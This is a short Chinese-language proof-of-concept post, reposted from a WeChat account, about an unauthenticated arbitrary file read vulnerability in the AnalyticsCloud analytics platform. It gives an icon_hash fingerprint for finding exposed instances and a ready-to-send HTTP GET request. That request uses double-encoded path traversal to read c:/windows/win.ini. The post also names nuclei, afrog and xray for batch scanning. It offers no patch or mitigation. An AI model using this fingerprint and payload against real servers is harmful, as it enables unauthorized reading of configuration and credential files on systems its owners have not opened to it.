AnalyticsCloud 分析云 任意文件读取漏洞 poc

0x01 产品简介

AnalyticsCloud 分析云集成了先进的数据分析技术和工具，能够处理来自各种数据源的数据，包括云数据、本地数据、传统数据和大数据等。它提供了从数据收集、整理、分析到应用的全链路解决方案，帮助企业更好地理解和利用数据，从而优化业务流程、提升决策效率。

0x02 漏洞概述

AnalyticsCloud 分析云 存在任意文件读取漏洞，未经身份验证攻击者可通过该漏洞读取系统重要文件（如数据库配置文件、系统配置文件）、数据库配置文件等等，导致网站处于极度不安全状态。

0x03 搜索引擎

icon_hash="888607769"

0x04 漏洞复现

GET /.%252e/.%252e/c:/windows/win.ini HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive

0x05 工具批量

nuclei

afrog

xray

原文始发于微信公众号（nday POC）：【漏洞复现】AnalyticsCloud 分析云 任意文件读取漏洞